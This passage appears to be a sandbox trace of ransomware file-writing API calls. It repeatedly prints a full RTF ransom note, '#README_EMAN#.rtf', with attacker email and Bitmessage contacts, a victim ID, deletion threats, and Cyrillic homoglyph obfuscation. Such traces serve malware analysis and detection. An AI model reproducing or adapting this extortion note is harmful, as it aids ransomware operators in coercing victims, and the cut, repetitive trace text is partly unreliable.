r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.533] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.534] CloseHandle (hObject=0x2c8) returned 1 [0272.534] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\#readme_eman#.rtf")) returned 0xffffffff [0272.534] GetLastError () returned 0x2 [0272.534] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link 